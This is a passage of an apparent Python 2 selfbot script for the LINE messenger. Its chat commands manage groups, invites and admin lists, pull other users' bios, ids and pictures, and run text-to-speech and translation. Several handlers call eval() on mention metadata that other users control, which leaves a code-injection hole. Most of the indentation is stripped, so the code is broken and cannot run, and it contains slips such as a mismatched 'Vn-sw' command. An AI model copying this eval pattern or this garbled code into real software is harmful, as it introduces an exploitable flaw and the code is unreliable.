cl.sendText(msg.to,"Can not be used outside the group")
else:
                            cl.sendText(msg.to,"This can only be used in a group")
#================================================================================
elif 'clear invites' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
group = cl.getGroup(msg.to)
gMembMids = [contact.mid for contact in group.invitee]
for _mid in gMembMids:
random.choice(KAC).cancelGroupInvitation(msg.to,[_mid])
                        cl.sendText(msg.to,"Cancelled all pending invitations.")
elif 'link open' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
                            cl.sendText(msg.to,"Cannot be used outside the group")
else:
                            cl.sendText(msg.to,"This can only be used in a group")
#===========================================================================
elif 'link close' in msg.text.lower():
if msg.from_ in admin:
if msg.toType == 2:
uye = random.choice(KAC)
X = cl.getGroup(msg.to)
X.preventJoinByTicket = True
uye.updateGroup(X)
if wait["lang"] == "JP":
uye.sendText(msg.to,"done")
else:
uye.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
                            cl.sendText(msg.to,"Cannot be used outside the group")
else:
                            cl.sendText(msg.to,"This can only be used in a group")
#============================================================
elif msg.text.lower() == 'ginfo':
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
msg.contentType = 13
msg.contentMetadata = {'mid': ginfo.creator.mid}
cl.sendText(msg.to,"[display name]\n" + str(ginfo.name) + "\n[Group Id]\n" + msg.to + "\n\n[Group Creator]\n" + gCreator + "\n\nmembers:" + str(len(ginfo.members)) + "\nInvitation:" + sinvitee + "")
cl.sendMessage(msg)
#===============================================================
elif 'group list' in msg.text.lower():
if msg.from_ in admin:
gs = cl.getGroupIdsJoined()
L = "『 Groups List 』\n"
for i in gs:
L += "[≫] %s \n" % (cl.getGroup(i).name + " | [ " + str(len (cl.getGroup(i).members)) + " ]")
cl.sendText(msg.to, L + "\nTotal Group : [ " + str(len(gs)) +" ]")
elif "Invite me" in msg.text:
if msg.from_ in owner:
gid = cl.getGroupIdsJoined()
for i in gid:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(i,[msg.from_])
cl.sendText(msg.to, "successfully invited you to all groups")
elif "Steal group pict" in msg.text:
if msg.from_ in admin:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Turn off bots" in msg.text:
if msg.from_ in owner:
try:
import sys
sys.exit()
except:
pass
#==================================================================
elif "Steal bio" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,contact.statusMessage)
except:
cl.sendText(msg.to,contact.statusMessage)
            elif 'creator' in msg.text.lower():
if msg.from_ in admin:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
cl.sendText(msg.to,"My Creator ")
elif "Admin on @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff add executing"
_name = msg.text.replace("Admin on @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.append(target)
                                cl.sendText(msg.to,"successfully added to adminlist")
except:
pass
print "[Command]Staff add executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"owner permission required.")
elif msg.text.lower() == 'admin list':
if msg.from_ in admin:
if admin == []:
cl.sendText(msg.to,"The adminlist is empty")
else:
cl.sendText(msg.to,"loading...")
mc = ""
gh = ""
for mi_d in owner:
mc += "->" +cl.getContact(mi_d).displayName + "\n"
for mi_d in admin:
gh += "->" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,"=======OWNER=======\n\n" + mc + "\n=======ADMIN=======\n\n" + gh +"\n=====================\n")
print "[Command]Stafflist executed"
elif "Expel on @" in msg.text:
if msg.from_ in owner:
print "[Command]Staff remove executing"
_name = msg.text.replace("Expel on @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
admin.remove(target)
                                cl.sendText(msg.to,"Successfully removed admin from adminlist")
except:
pass
print "[Command]Staff remove executed"
else:
cl.sendText(msg.to,"Command denied.")
cl.sendText(msg.to,"owner permission required.")
#==========================================================
elif 'bot mid' in msg.text.lower():
if msg.from_ in admin:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
kk.sendText(msg.to,Bmid)
kc.sendText(msg.to,Cmid)
ks.sendText(msg.to,Dmid)
kt.sendText(msg.to,Emid)
#=======================================================
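            # "Vn-<lang> <text>" commands: synthesize the text with gTTS in the requested
            # language and send the result back as an audio message.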
elif "Vn-af " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-af ","")
tts = gTTS(psn, lang='af', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-sq " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-sq ","")
tts = gTTS(psn, lang='sq', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ar " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ar ","")
tts = gTTS(psn, lang='ar', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-hy " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-hy ","")
tts = gTTS(psn, lang='hy', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-bn " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-bn ","")
tts = gTTS(psn, lang='bn', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ca " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ca ","")
tts = gTTS(psn, lang='ca', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-zh " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-zh ","")
tts = gTTS(psn, lang='zh', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-zhcn " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-zhcn ","")
tts = gTTS(psn, lang='zh-cn', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-zhtw " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-zhtw ","")
tts = gTTS(psn, lang='zh-tw', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-zhyue " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-zhyue ","")
tts = gTTS(psn, lang='zh-yue', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-hr " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-hr ","")
tts = gTTS(psn, lang='hr', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-cs " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-cs ","")
tts = gTTS(psn, lang='cs', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-da " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-da ","")
tts = gTTS(psn, lang='da', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-nl " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-nl ","")
tts = gTTS(psn, lang='nl', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-en " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-en ","")
tts = gTTS(psn, lang='en', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-enau " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-enau ","")
tts = gTTS(psn, lang='en-au', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-enuk " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-enuk ","")
tts = gTTS(psn, lang='en-uk', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-enus " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-enus ","")
tts = gTTS(psn, lang='en-us', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-eo " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-eo ","")
tts = gTTS(psn, lang='eo', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-fi " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-fi ","")
tts = gTTS(psn, lang='fi', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-fr " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-fr ","")
tts = gTTS(psn, lang='fr', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-de " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-de ","")
tts = gTTS(psn, lang='de', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-el " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-el ","")
tts = gTTS(psn, lang='el', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-hi " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-hi ","")
tts = gTTS(psn, lang='hi', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-hu " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-hu ","")
tts = gTTS(psn, lang='hu', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-is " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-is ","")
tts = gTTS(psn, lang='is', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-id " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-id ","")
tts = gTTS(psn, lang='id', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-it " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-it ","")
tts = gTTS(psn, lang='it', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-jp " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-jp ","")
tts = gTTS(psn, lang='ja', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-km " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-km ","")
tts = gTTS(psn, lang='km', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ko " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ko ","")
tts = gTTS(psn, lang='ko', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-la " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-la ","")
tts = gTTS(psn, lang='la', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-lv " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-lv ","")
tts = gTTS(psn, lang='lv', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-mk " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-mk ","")
tts = gTTS(psn, lang='mk', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-no " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-no ","")
tts = gTTS(psn, lang='no', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-pl " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-pl ","")
tts = gTTS(psn, lang='pl', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-pt " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-pt ","")
tts = gTTS(psn, lang='pt', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ro " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ro ","")
tts = gTTS(psn, lang='ro', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ru " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ru ","")
tts = gTTS(psn, lang='ru', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-sr " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-sr ","")
tts = gTTS(psn, lang='sr', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-si " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-si ","")
tts = gTTS(psn, lang='si', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-sk " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-sk ","")
tts = gTTS(psn, lang='sk', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-es " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-es ","")
tts = gTTS(psn, lang='es', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-eses " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-eses ","")
tts = gTTS(psn, lang='es-es', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-esus " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-esus ","")
tts = gTTS(psn, lang='es-us', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-sw " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-sv ","")
tts = gTTS(psn, lang='sv', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-ta " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-ta ","")
tts = gTTS(psn, lang='ta', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-th " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-th ","")
tts = gTTS(psn, lang='th', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-tr " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-tr ","")
tts = gTTS(psn, lang='tr', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-uk " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-uk ","")
tts = gTTS(psn, lang='uk', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-vi " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-vi ","")
tts = gTTS(psn, lang='vi', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
elif "Vn-cy " in msg.text:
if msg.from_ in admin:
psn = msg.text.replace("Vn-cy ","")
tts = gTTS(psn, lang='cy', slow=False)
tts.save('tts.mp3')
cl.sendAudio(msg.to, 'tts.mp3')
#=======================================================
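# Self-profile commands: Myname, Mybio, Mypict, Myvid, Urlpict, Mycover and Urlcover send back this account's own display name, bio, avatar and cover.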
elif msg.text in ["Myname"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["Mybio"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["Mypict"]:
h = cl.getContact(mid)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Myvid"]:
h = cl.getContact(mid)
cl.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Urlpict"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Mycover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
elif msg.text in ["Urlcover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendText(msg.to, path)
#=======================================================
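# Translate-xx commands: pass the text to the Translator() client (presumably googletrans) and send back the translation in the chosen language.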
elif "Translate-arab " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-arab ","")
try:
translator = Translator()
trs = translator.translate(txt,'ar')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-korea " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-korea ","")
try:
translator = Translator()
trs = translator.translate(txt,'ko')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-chin " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-chin ","")
try:
translator = Translator()
trs = translator.translate(txt,'zh-cn')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-japan " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-japan ","")
try:
translator = Translator()
trs = translator.translate(txt,'ja')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-thai " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-thai ","")
try:
translator = Translator()
trs = translator.translate(txt,'th')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-idn " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-idn ","")
try:
translator = Translator()
trs = translator.translate(txt,'id')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Translate-eng " in msg.text:
if msg.from_ in admin:
txt = msg.text.replace("Translate-eng ","")
try:
translator = Translator()
trs = translator.translate(txt,'en')
A = trs.text
A = A.encode('utf-8')
cl.sendText(msg.to,A)
except:
cl.sendText(msg.to,'Error.')
elif "Say " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Say ","")
cl.sendText(msg.to,(bctxt))
kk.sendText(msg.to,(bctxt))
kc.sendText(msg.to,(bctxt))
ki.sendText(msg.to,(bctxt))
ks.sendText(msg.to,(bctxt))
kt.sendText(msg.to,(bctxt))
#======================================
elif "TL:" in msg.text:
if msg.from_ in admin:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
#=================================================================
elif msg.text in ["Protect:hight","protect:hight"]:
if msg.from_ in admin:
if wait["protectionOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into high protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Blockqr:off","blockqr:off"]:
if msg.from_ in admin:
if wait["qr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
#≠≠================≠==================≠====≠===========!=======!==!
elif msg.text in ["Auto reinvite:off","auto reinvite:off"]:
if msg.from_ in admin:
if wait["autorein"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to, "Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["autorein"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to, "Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Auto reinvite:on","auto reinvite:on"]:
if msg.from_ in admin:
if wait["autorein"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to, "Already on\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to ,"Already on\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["autorein"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to, "Already on\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on\n"+ datetime.today().strftime('%H:%M:%S'))
##≠========================&=&==&=&=%=%=%=%==%=%=%=%;%;%;;%;;%;%
elif msg.text in ["Welcome message:on"]:
if msg.from_ in admin:
if wait["welcomemsg"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message on")
elif msg.text in ["Blockqr:on","blockqr:on"]:
if msg.from_ in admin:
if wait["qr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["qr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protection QR PRO On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Welcome message:off"]:
if msg.from_ in admin:
if wait["welcomemsg"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["welcomemsg"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"welcome message off\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Protect:low","Protect:low"]:
if msg.from_ in admin:
if wait["protectionOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["protectionOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"turned into low protection\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Namelock:on" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝЄƊ ƠƝ.")
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƝ")
wait['pname'][msg.to] = True
wait['pro_name'][msg.to] = cl.getGroup(msg.to).name
elif "Namelock:off" in msg.text:
if msg.from_ in admin:
if msg.to in wait['pname']:
cl.sendText(msg.to,"ƬƲƦƝ ƠƑƑ.")
del wait['pname'][msg.to]
else:
cl.sendText(msg.to,"ƛԼƦЄƛƊƳ ƠƑƑ")
elif "Denyinvites on" == msg.text:
if msg.from_ in admin:
gid = msg.to
autocancel[gid] = "poni"
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƝ")
elif "Denyinvites off" == msg.text:
if msg.from_ in admin:
try:
del autocancel[msg.to]
cl.sendText(msg.to,"ƤƦƠƬЄƇƬ ƖƝƔƖƬƛƬƖƠƝ ƠƑƑ")
except:
pass
#================================================================
elif msg.text in ["Shows offenders:on"]:
if msg.from_ in admin:
if wait["pelaku"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable ")
else:
wait["pelaku"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable ")
elif msg.text in ["Shows offenders:off"]:
if msg.from_ in admin:
if wait["pelaku"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable ")
else:
wait["pelaku"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable")
elif msg.text in ["Invite user"]:
if msg.from_ in admin:
wait["winvite"] = True
cl.sendText(msg.to,"send contact")
#============================================================
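# Steal mid / Steal contact / Mc: read the mention metadata (or a raw mid) and reply with the target's mid or contact card.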
elif "Steal mid" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
cl.sendText(msg.to,"Mc: " + key1)
elif "Steal contact" in msg.text:
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Mc:" in msg.text:
if msg.from_ in admin:
mmid = msg.text.replace("Mc:","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
#==========≠===============================
elif msg.text in ["Tag on"]:
if wait["tag"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already set to on")
else:
cl.sendText(msg.to,"Tag On")
else:
wait["tag"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag On")
else:
cl.sendText(msg.to,"already set to on")
elif msg.text in ["Tag off"]:
if wait["tag"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already set to off")
else:
cl.sendText(msg.to,"Tag Off")
else:
wait["tag"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tag Off")
else:
cl.sendText(msg.to,"Already set to off")
#=======================================================
elif msg.text in ["Auto notice:on"]:
if msg.from_ in admin:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable notifications")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already activated")
else:
cl.sendText(msg.to,"enable notifications")
#=========================================================================
elif msg.text in ["Auto notice:off"]:
if msg.from_ in admin:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable notifications")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"disable notifications")
elif msg.text in ["Auto join:on"]:
if msg.from_ in admin:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"")
else:
cl.sendText(msg.to,"already activated")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"enable auto koin")
else:
cl.sendText(msg.to,"")
elif msg.text in ["Auto join:off"]:
if msg.from_ in admin:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"desable auto join")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already unactivated")
else:
cl.sendText(msg.to,"desable auto join")
elif "Gcancel:" in msg.text:
if msg.from_ in admin:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒绝。要时开请指定人数发送")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
